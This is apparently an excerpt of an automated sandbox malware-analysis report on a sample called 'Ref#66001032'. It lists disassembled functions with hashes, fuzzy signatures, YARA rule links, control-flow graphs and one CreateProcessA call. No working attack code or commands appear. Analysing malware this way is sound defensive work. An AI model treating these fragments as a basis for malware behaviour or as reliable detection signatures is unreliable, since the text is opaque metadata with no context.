                                                                                                  • Instruction ID: c2e9f7b5819348c1f38453135ea54220b073d6438f13be931e797ffb41804b00
                                                                                                  • Opcode Fuzzy Hash: ad7eab7abb5902611899c73d6c0c20755a70548f136c2505111285f316f01c7f
                                                                                                  • Instruction Fuzzy Hash: 1BD1E370E06618CFDB94DF69D884BADBBF2FB89304F2090AAD509A7355DB745A85CF00
                                                                                                  Function 056F3B30 Relevance: .3, Instructions: 286COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4d4c0563a5a549e424d68448444575dc617621bb1470e7c506f84bb4cebbb5e2
                                                                                                  • Instruction ID: 75759d1f155f7dca9cd44b5a715b8cf865bf47f5b81fedfda054902118334697
                                                                                                  • Opcode Fuzzy Hash: 4d4c0563a5a549e424d68448444575dc617621bb1470e7c506f84bb4cebbb5e2
                                                                                                  • Instruction Fuzzy Hash: 24D1D370E06618CFDB94DF69D884BADBBB2FB89304F1090AAD509A7354DB745986CF00
                                                                                                  Function 066BF948 Relevance: .3, Instructions: 276COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8fc9e0770141c8f7020706314931616775f8e21002649e920ba0b1ea10da51a2
                                                                                                  • Instruction ID: 727852652cddb316d3bb1d878255d8ed04124e1ed928afe38840c8959a3cdda0
                                                                                                  • Opcode Fuzzy Hash: 8fc9e0770141c8f7020706314931616775f8e21002649e920ba0b1ea10da51a2
                                                                                                  • Instruction Fuzzy Hash: 14D1B274E01219CFDB54DFA9D890A9DBBB2FF88304F1091A9D409AB365DB31AD81CF50
                                                                                                  Function 056F3C24 Relevance: .3, Instructions: 276COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 62edd3e1c6f012af57c0207d62a9a700a95d079f6a7d23c2f68bbd0eb66d3a62
                                                                                                  • Instruction ID: c6756463ce409a16010b3c7010338365aa78ed0bea6495be83e3d950fe43953b
                                                                                                  • Opcode Fuzzy Hash: 62edd3e1c6f012af57c0207d62a9a700a95d079f6a7d23c2f68bbd0eb66d3a62
                                                                                                  • Instruction Fuzzy Hash: 41C1D370E06618CFDB94DF69D884BADBBB2FB89304F2094A9D509A7354DB745D86CF00
                                                                                                  Function 061E88F0 Relevance: .2, Instructions: 247COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3522559543.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d2c9badfd648dc4e27dcd407764de1972c4862ee7992f5e7ddc730a87b41429
                                                                                                  • Instruction ID: c4919dc0bf8527446157e486abfaae8876434ddd95bfbe6fc575d64ed8b6b641
                                                                                                  • Opcode Fuzzy Hash: 2d2c9badfd648dc4e27dcd407764de1972c4862ee7992f5e7ddc730a87b41429
                                                                                                  • Instruction Fuzzy Hash: FDB14870E05618CFEB94DFA9D884B9EBBF2FB89304F1084A9D409A7395DB749985CF40
                                                                                                  Function 026C3EE3 Relevance: .2, Instructions: 204COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 775a39ed7959fe4c4e68e0630b0054669cc4d19e3985f5f8bce7d498bfd1b4cd
                                                                                                  • Instruction ID: 77d68eaec43125aa36704e146d993169156c6c43c125892271cc5a614fcc611a
                                                                                                  • Opcode Fuzzy Hash: 775a39ed7959fe4c4e68e0630b0054669cc4d19e3985f5f8bce7d498bfd1b4cd
                                                                                                  • Instruction Fuzzy Hash: 39611130B042449BD718EA78886477A7BB6EB85310F2188AED416DB3D6DE70CC428792
                                                                                                  Function 061E0040 Relevance: .2, Instructions: 185COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3522559543.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f6c46804d697b1ad76ed0518d4e1d15b3b741c1bf6e3d7fb6655132d0b5ba781
                                                                                                  • Instruction ID: f5538adc512686cc59ce65f927404eddeeffb46bd14b25edef766db6cfa91a9b
                                                                                                  • Opcode Fuzzy Hash: f6c46804d697b1ad76ed0518d4e1d15b3b741c1bf6e3d7fb6655132d0b5ba781
                                                                                                  • Instruction Fuzzy Hash: 99714970E40619CFEBA8CF69C8407AEB7B6EB88300F54C5A9D50AE7754DB749A81CF50
                                                                                                  Function 026C7C58 Relevance: .2, Instructions: 168COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ee6bed4a5b1deccb5b158704cce0d75e1a6c6f6ff049da52de4dd535979e458c
                                                                                                  • Instruction ID: 88339e0545c8fd51256a2145f035db134fb3b825bf51e7a33e104215043b9894
                                                                                                  • Opcode Fuzzy Hash: ee6bed4a5b1deccb5b158704cce0d75e1a6c6f6ff049da52de4dd535979e458c
                                                                                                  • Instruction Fuzzy Hash: 28711870E00609CFDB48EF6AE84169EBBF2FFC8308F14C469D014AB269EB7419199F45
                                                                                                  Function 026C7C64 Relevance: .2, Instructions: 167COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8ab0803c7fe839da27ec0f7a16a18d8b7c46520f7b25835d181a0dfd133dce3
                                                                                                  • Instruction ID: 636b5dc478614557496234aef1afcd91f1465ab7501ab56627bc7cd063c157d2
                                                                                                  • Opcode Fuzzy Hash: d8ab0803c7fe839da27ec0f7a16a18d8b7c46520f7b25835d181a0dfd133dce3
                                                                                                  • Instruction Fuzzy Hash: 3D711770D00609CFDB48EF6AE84169EBBF2FFC8308F14C569D054AB269EB7419199F45
                                                                                                  Function 026C7C68 Relevance: .2, Instructions: 165COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a4da2a5d3672b7ff9509b5aa73d7d5980ac222a961f4a93adee4e9325d71ed9
                                                                                                  • Instruction ID: f56c704092bc90336c17fe9c28e76e1deec8c0b8134f0de7e4f80a1ee291865f
                                                                                                  • Opcode Fuzzy Hash: 5a4da2a5d3672b7ff9509b5aa73d7d5980ac222a961f4a93adee4e9325d71ed9
                                                                                                  • Instruction Fuzzy Hash: 10710770E00609CFDB48EF6AE84169EBBF2FFC8309F14C569D014AB269EB7419199F45
                                                                                                  Function 066BF668 Relevance: .2, Instructions: 154COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8046edce282da48cee158c455b6f8fb52a29ed8376b476bbe8bcebfbedd9803c
                                                                                                  • Instruction ID: 68390c688e77691487120b32fa6860e8eec4af36ad38e679db2ef562565d977a
                                                                                                  • Opcode Fuzzy Hash: 8046edce282da48cee158c455b6f8fb52a29ed8376b476bbe8bcebfbedd9803c
                                                                                                  • Instruction Fuzzy Hash: 6B510874E00219CFDB44DFAAD8846EEBBF2FF88300F149169D815A7364E77499828B94
                                                                                                  Function 0621001F Relevance: .1, Instructions: 146COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 43e060fd8e5d337dc9d3d18b72b34c4737c7c47e8e1dee4e194f96e29dd9137b
                                                                                                  • Instruction ID: cd5fb274608b8402064410be95e70947284530b528459dd90b3e7521f5b0d02f
                                                                                                  • Opcode Fuzzy Hash: 43e060fd8e5d337dc9d3d18b72b34c4737c7c47e8e1dee4e194f96e29dd9137b
                                                                                                  • Instruction Fuzzy Hash: 10510A71E04A588BEB18CF6BCC4469ABBF3BFC9305F14C1A9D448AA259DB744A85CF50
                                                                                                  Function 06215EC0 Relevance: .1, Instructions: 138COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: badb034f105d06210dd8dd153ceb460baf044029aff61b6dee88999e5bf973dd
                                                                                                  • Instruction ID: 524789f7db542017b7c49d79f843954e6da125bb2826de8bb3064590d181c3a1
                                                                                                  • Opcode Fuzzy Hash: badb034f105d06210dd8dd153ceb460baf044029aff61b6dee88999e5bf973dd
                                                                                                  • Instruction Fuzzy Hash: 6051D5B4D15268CFDB54CFAAC9487DDBBF2AB89300F14C0AAD809BB214D7744A89CF40
                                                                                                  Function 06210036 Relevance: .1, Instructions: 135COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5e043f57c65c3b3e50c9a55a5815e91c5dd1d082de156b9bcdba697ad0470aff
                                                                                                  • Instruction ID: 0963f7d428d44cfed9ff33a4806c869b6921c0ada649f370c1605e670bc060d6
                                                                                                  • Opcode Fuzzy Hash: 5e043f57c65c3b3e50c9a55a5815e91c5dd1d082de156b9bcdba697ad0470aff
                                                                                                  • Instruction Fuzzy Hash: C851BA71E10A188BEB58DF6BDC4469AFAF3BFC8305F14C1A9D408AA258DB745A85CF50
                                                                                                  Function 06210038 Relevance: .1, Instructions: 134COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cc01fde875e456f6632bdc33050a840e6a3e1df03c9eafa25148e2acab38d2af
                                                                                                  • Instruction ID: 10f33cdf6a7dbeae083b8fd7f6fc00c0845ed2aa39c4b8c15af9ef37a7d1b905
                                                                                                  • Opcode Fuzzy Hash: cc01fde875e456f6632bdc33050a840e6a3e1df03c9eafa25148e2acab38d2af
                                                                                                  • Instruction Fuzzy Hash: 6951CB71E10A188BEB58CF6BDC4479AFAF3BFC8305F14C1A9D408AA259DB745A85CF50
                                                                                                  Function 06215EB1 Relevance: .1, Instructions: 133COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 873cebf477bbdf396bfd1c0bb98d5ba47838317d9ac485d0f91e1eb64f0d41e2
                                                                                                  • Instruction ID: 0e8cbfbb01f3a39e0554d08db19bfe19398f17a5ad453361e4b6e9ce7408df95
                                                                                                  • Opcode Fuzzy Hash: 873cebf477bbdf396bfd1c0bb98d5ba47838317d9ac485d0f91e1eb64f0d41e2
                                                                                                  • Instruction Fuzzy Hash: 6051C4B4D15668CFDB54CFAAC9487DDBBF2AB89300F14C0EAD819AB214D7744A89CF40
                                                                                                  Function 026C54F7 Relevance: 3.9, Strings: 2, Instructions: 1443COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 26c54f7-26c54fa 1 26c54fc-26c54fd 0->1 2 26c54e4-26c54f1 0->2 3 26c54ff-26c550c 1->3 4 26c5487-26c5493 1->4 11 26c43ec-26c43f5 2->11 9 26c5876-26c587e 3->9 10 26c5512-26c5539 3->10 7 26c544f-26c546b 4->7 8 26c5495-26c54e2 4->8 7->11 8->2 10->9 10->11 13 26c43fe-26c4403 11->13 14 26c43f7 11->14 13->11 14->13 17 26c4438-26c446d 14->17 18 26c4405-26c4436 14->18 19 26c4472-26c4560 14->19 17->11 18->11 19->9 52 26c4566 19->52 53 26c456e-26c4787 52->53 53->9 66 26c478d-26c48b0 53->66 66->9 73 26c48b6-26c49f0 66->73 73->9 80 26c49f6-26c4b19 73->80 80->9 87 26c4b1f-26c541f 80->87 87->11
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4$jjjjjj
                                                                                                  • API String ID: 0-102010443
                                                                                                  • Opcode ID: a2a8fc3c381ccf2e031b089a43abef80e945ca2b49ab6cb013e0747a19e8a71a
                                                                                                  • Instruction ID: 03a0f90964ec07572d5350b76c04ff729c58d599dd97aa9fcf7cef641e34e881
                                                                                                  • Opcode Fuzzy Hash: a2a8fc3c381ccf2e031b089a43abef80e945ca2b49ab6cb013e0747a19e8a71a
                                                                                                  • Instruction Fuzzy Hash: 5BE2177A250510EFDB4A9F98D988D55BBB2FF4D32471A81D8F2099B232C732D861EF50
                                                                                                  Function 026C5476 Relevance: 3.9, Strings: 2, Instructions: 1430COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 144 26c5476-26c5493 148 26c544f-26c546b 144->148 149 26c5495-26c54f1 144->149 152 26c43ec-26c43f5 148->152 149->152 153 26c43fe-26c4403 152->153 154 26c43f7 152->154 153->152 154->153 156 26c4438-26c446d 154->156 157 26c4405-26c4436 154->157 158 26c4472-26c4560 154->158 156->152 157->152 189 26c5876-26c587e 158->189 190 26c4566 158->190 191 26c456e-26c4787 190->191 191->189 205 26c478d-26c48b0 191->205 205->189 212 26c48b6-26c49f0 205->212 212->189 219 26c49f6-26c4b19 212->219 219->189 226 26c4b1f-26c541f 219->226 226->152
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4$jjjjjj
                                                                                                  • API String ID: 0-102010443
                                                                                                  • Opcode ID: dae9ddc582c63ecccf11a168ecb42ff38f153e4799e3257f969125f3957e415f
                                                                                                  • Instruction ID: 82f8213b264220fec9027988f8257097523421aaad4568b4f77423354aaf42f2
                                                                                                  • Opcode Fuzzy Hash: dae9ddc582c63ecccf11a168ecb42ff38f153e4799e3257f969125f3957e415f
                                                                                                  • Instruction Fuzzy Hash: 82E2077A250510EFDB4A9F98D988D55BBB2FF4D32471A81D8F2099B232C732D861EF50
                                                                                                  Function 026C553F Relevance: 2.7, Strings: 1, Instructions: 1422COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 448 26c553f-26c5542 449 26c552c-26c5539 448->449 450 26c5544-26c5545 448->450 457 26c5876-26c587e 449->457 458 26c43ec-26c43f5 449->458 451 26c54cf 450->451 452 26c5547 450->452 453 26c54d4-26c54f1 451->453 452->453 454 26c5549-26c5554 452->454 453->458 456 26c555a-26c5584 454->456 454->457 456->457 456->458 460 26c43fe-26c4403 458->460 461 26c43f7 458->461 460->458 461->460 464 26c4438-26c446d 461->464 465 26c4405-26c4436 461->465 466 26c4472-26c4560 461->466 464->458 465->458 466->457 493 26c4566 466->493 494 26c456e-26c4787 493->494 494->457 507 26c478d-26c48b0 494->507 507->457 514 26c48b6-26c49f0 507->514 514->457 521 26c49f6-26c4b19 514->521 521->457 528 26c4b1f-26c541f 521->528 528->458
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: jjjjjj
                                                                                                  • API String ID: 0-3900813449
                                                                                                  • Opcode ID: 01b1de257040d04c0363dc45c0383d8048d3d36eb5b80884d3b1f24f6df4661a
                                                                                                  • Instruction ID: 3a364c1b28be37e22b88183de36af9ca8a035b625caa674d4a0db441c37f3d99
                                                                                                  • Opcode Fuzzy Hash: 01b1de257040d04c0363dc45c0383d8048d3d36eb5b80884d3b1f24f6df4661a
                                                                                                  • Instruction Fuzzy Hash: EDE2077A250510EFDB4A9F98D988D55BBB2FF4D32471A81D8F2099B232C732D861EF50
                                                                                                  Function 063182F0 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 585 63182f0-6318310 620 6318316 call 631a2d9 585->620 621 6318316 call 631a2e8 585->621 587 631831c-631833c 588 6318349-6318351 587->588 589 631833e-6318347 587->589 590 6318353-6318354 588->590 591 6318356-6318373 588->591 589->588 590->591 593 6318375-6318397 591->593 594 63183be-63183c7 591->594 596 63183a6-63183af 593->596 597 6318399-63183a4 593->597 595 631840f-6318416 594->595 600 6318450 595->600 601 6318418-631843a 595->601 598 63183b1 596->598 599 63183b8-63183b9 596->599 597->596 598->594 598->599 598->600 602 6318197-63181d2 598->602 603 63183c9-6318400 598->603 604 63183bb-631840d 598->604 605 631852b-631853c 598->605 599->594 600->605 601->596 606 6318440-631844b 601->606 608 6317f97-6317f9d 602->608 619 63181d8-63181e0 602->619 603->596 604->595 605->608 606->596 609 6317fa6-63182e9 608->609 610 6317f9f-631868c 608->610 609->608 610->608 618 6318692-631869a 610->618 618->608 619->608 620->587 621->587
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2$@
                                                                                                  • API String ID: 0-1603946714
                                                                                                  • Opcode ID: 057e121bf1c87b6c510eacb4bf270ed0b459680af20af55073245f5a0be9ae8f
                                                                                                  • Instruction ID: b8acb09f4631c5a4f143bac1a9e30edeeea4694a87f1f322ec24fc65453728d5
                                                                                                  • Opcode Fuzzy Hash: 057e121bf1c87b6c510eacb4bf270ed0b459680af20af55073245f5a0be9ae8f
                                                                                                  • Instruction Fuzzy Hash: 0A411774D05218CFEBA8CF69C844BD9B7F9BB49304F1494E5D109AB244DB744A86CF88
                                                                                                  Function 0631CC7B Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 937 631cc7b-631cc80 938 631cc82-631cc83 937->938 939 631cc5a-631cc66 937->939 940 631d9f7-631da18 call 631e508 938->940 941 631cc89-631cca8 938->941 942 631cc6c-631cc74 939->942 943 631cb8e-631ce57 939->943 950 631da1e-631da3d 940->950 941->943 945 631ccae-631ccb6 941->945 942->943 948 631ce59 943->948 949 631ce5e-631ce81 943->949 945->943 948->949 949->943 951 631ce87-631ce8d 949->951 950->943 951->943
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$M
                                                                                                  • API String ID: 0-873950835
                                                                                                  • Opcode ID: 2f4c7483c62f1ac4f4f37e3ba35714a4c3b64a1824e9043d58e2c93cb29aa689
                                                                                                  • Instruction ID: 67689877dc976f5e6b8fb3a2ddc625137aab9da1765272c9a762d7f11ec84440
                                                                                                  • Opcode Fuzzy Hash: 2f4c7483c62f1ac4f4f37e3ba35714a4c3b64a1824e9043d58e2c93cb29aa689
                                                                                                  • Instruction Fuzzy Hash: C1117134950195CFEB84DF68E898F9977F9FB05318F00A295E105EB284D7785995CF80
                                                                                                  Function 062184E9 Relevance: 2.5, Strings: 2, Instructions: 28COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 981 62184e9-6218b2a 983 6218b30-6218b55 call 6215df8 981->983 984 62198d9-62198e8 981->984 988 6218b5b-6218b63 983->988 989 621819f-62181a7 983->989 987 62198ef-6219902 984->987 988->989 990 62181b0-62192a7 989->990 991 62181a9-6218690 call 6216ff0 989->991 993 621a0a1-621a0b3 990->993 994 62192ad-62192b5 990->994 991->989 1004 6218696-621869e 991->1004 998 621a0b9-621a0c1 993->998 999 621823a-6218281 call 6215df8 993->999 994->989 998->989 999->989 1008 6218287-621828f 999->1008 1004->989 1008->989
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: L$w
                                                                                                  • API String ID: 0-3108546703
                                                                                                  • Opcode ID: 47b929c9b9f5f64275d1185ac266cbf140582e1d6889591e92c126cb7e81a525
                                                                                                  • Instruction ID: e2f9a892a0b03e2261238d3afd9382240298a6ff6d9d031074836edfe862a3c4
                                                                                                  • Opcode Fuzzy Hash: 47b929c9b9f5f64275d1185ac266cbf140582e1d6889591e92c126cb7e81a525
                                                                                                  • Instruction Fuzzy Hash: 8F01A4B0D2A229DFEBA18F64D988B9CB7F5BF55300F501196D909B6250C7785A81CF02
                                                                                                  Function 056FCEAC Relevance: 1.7, APIs: 1, Instructions: 205processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1693 56fceac-56fcf28 1695 56fcf2a-56fcf34 1693->1695 1696 56fcf61-56fcf81 1693->1696 1695->1696 1697 56fcf36-56fcf38 1695->1697 1701 56fcfba-56fcff4 1696->1701 1702 56fcf83-56fcf8d 1696->1702 1699 56fcf5b-56fcf5e 1697->1699 1700 56fcf3a-56fcf44 1697->1700 1699->1696 1703 56fcf48-56fcf57 1700->1703 1704 56fcf46 1700->1704 1712 56fd02d-56fd0a2 CreateProcessA 1701->1712 1713 56fcff6-56fd000 1701->1713 1702->1701 1705 56fcf8f-56fcf91 1702->1705 1703->1703 1706 56fcf59 1703->1706 1704->1703 1707 56fcfb4-56fcfb7 1705->1707 1708 56fcf93-56fcf9d 1705->1708 1706->1699 1707->1701 1710 56fcf9f 1708->1710 1711 56fcfa1-56fcfb0 1708->1711 1710->1711 1711->1711 1714 56fcfb2 1711->1714 1723 56fd0ab-56fd0f3 1712->1723 1724 56fd0a4-56fd0aa 1712->1724 1713->1712 1715 56fd002-56fd004 1713->1715 1714->1707 1717 56fd027-56fd02a 1715->1717 1718 56fd006-56fd010 1715->1718 1717->1712 1719 56fd014-56fd023 1718->1719 1720 56fd012 1718->1720 1719->1719 1721 56fd025 1719->1721 1720->1719 1721->1717 1729 56fd0f5-56fd0f9 1723->1729 1730 56fd103-56fd107 1723->1730 1724->1723 1729->1730 1731 56fd0fb 1729->1731 1732 56fd109-56fd10d 1730->1732 1733 56fd117-56fd11b 1730->1733 1731->1730 1732->1733 1734 56fd10f 1732->1734 1735 56fd11d-56fd121 1733->1735 1736 56fd12b 1733->1736 1734->1733 1735->1736 1737 56fd123 1735->1737 1738 56fd12c 1736->1738 1737->1736 1738->1738
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 056FD092
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: ef99cfcb4c87101edeea03037b5e7862fb8fd090c65be8bbdddf60f3eda4395d
                                                                                                  • Instruction ID: 9f34e80cb064a70f922c7a8e004fb9aa3d6a1afa16c098ff1e8e944b98dd946b
                                                                                                  • Opcode Fuzzy Hash: ef99cfcb4c87101edeea03037b5e7862fb8fd090c65be8bbdddf60f3eda4395d
                                                                                                  • Instruction Fuzzy Hash: 2D8156B1D042599FEB10DFA9C8817EDBBF2FF48314F248129E919A7340D7749881CB81
